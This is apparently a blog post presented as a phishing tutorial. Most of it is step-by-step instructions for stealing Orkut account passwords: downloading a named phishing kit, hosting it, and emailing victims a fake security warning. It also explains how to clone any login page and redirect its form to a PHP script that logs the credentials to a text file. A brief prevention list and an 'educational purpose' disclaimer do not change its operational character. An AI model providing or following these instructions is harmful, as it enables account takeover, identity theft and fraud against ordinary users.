What is Phishing:
The act of sending email to a user falsely claiming to be an
established legitimate enterprise in an attempt to scam the user into surrendering
private information that will be used for identity theft
The Email directs the user to visit a web site where they
are asked to update personal information, such as passwords and credit card,
social security, and bank account numbers that the legitimate organization
already has. The web site, however, is bogus and set up only to steal the
user’s information.
Phishing attacks are
Trying to steal your Money !!!
Phishing scams Could
Be –
Ø
Emails inviting you to join a social group
,asking you to login using your username and password
Ø
Email saying that your bank account is locked
and sign in to your account to unlock it
Ø
Emails containing some information of your interest
and asking you to login to your account
Ø
Any Email carrying link to click and asking you
to login
The Phishing Hack
Starts Now. This Hack example is for orkut account.
Step 1 : download the necessary files which you will need
during the phishing attack .This file is a .rar file which includes 3 files
named hackingtech .php, hackingtech.txt & Service Login .html and also
consist a folder in which there are support files for ServerLogin.html
“You can Download the
pack From Here: http://www.hackingtech.co.tv/orkuthacking.rar”.
Step 2: Unrar the download pack named orkuthacking.rar anywhere on your computer.
Step 3: Upload the folder “ServiceLogin-files” and 2 of the
files->> “hackingtech.php” and “hackingtech.txt” in any web hosting site…
You will have to create a sub folder in the web hosting site’s
directory. Name that folder as “ServiceLogin-files” and upload the 2 images of
the pack in that folder. (it must supports PHPs.)
>>> You can
choose one of the following web hosting company to upload the folder.
http://Ripway.com{Recommended}
Step 4: your work is over now just give the link ofurfake
page to the victim and whenever he/she will type the password and sign in
.password will be stored in “hackingtech.txt”…..
General form of the
fake page’s link
Code:
Step 5: Now you can send this link to victim by any mode but
the best is my email send a fake email in the name of orkut the your orkut
account has a security problem pl. click on the link below and re-activate your
account . we will see how to send fake email within short time
Now if you want to
create your own phishing page the follow the steps below
Step 1: Open the website whose phishing page you want create.
Step 2: Then right click anywhere on the page and select
view source.
Step 3: Press (Ctrl + A) and the code will be selected and
then press (Ctrl + c) to copy the code.
Step 4: Then paste this code in a new notepad window and
save it as ServerLogin.htm
Step 5: Open “ServerLogin.htm” with notepad and the search
for word “action”. [Press Ctrl + f to find the word]
Step 6: You will find like this action =”https://www.google.com/accounts/serviceloginAuth”
Step 7: Replace the link between this red quotes with the
link you got by uploading the file hackingtech.php and it should be like this
action = “http://www.yourhostingcompany,com/username/hackingtech.php”
Step 8: Now Save this as serverlogin.htm
Step 9: Now upload the folder “ServiceLogin_files” and 2 of
the files ->> “hackingtech.php” and “hackingtech.txt” and serverlogin.htm
file in any web hosting site you want.
Step 10: You are done just go to the link of the file
serverlogin.htm given by your hosting company.
Step 11: Now you can send this link to victim by any mode
but the best is my email send a fake email in the name of orkut the your orkut
account has a security problem pl. click on the link below and re –activate
your account .We will see how to send fake email within short time.
Step 12: To see the passwords that you have hacked just go
to the link of hackingtech.txt given by your hosting company.
Prevention against phishing
Ø
Read all the Email Carefully and Check if the Sender
is Original.
Ø
Watch the Link Carefully before Clicking
Ø
Always check the URL in the Browser before
Signing IN to your Account
Ø
Always login to your Accounts after opening the
Trusted Websites, not by Clicking in any other Website or Email.
“Do
not use this hack trick in any criminal activities like phishing bank websites
and please do not destroy any ones account this is only foe educational purpose”.
No comments:
Post a Comment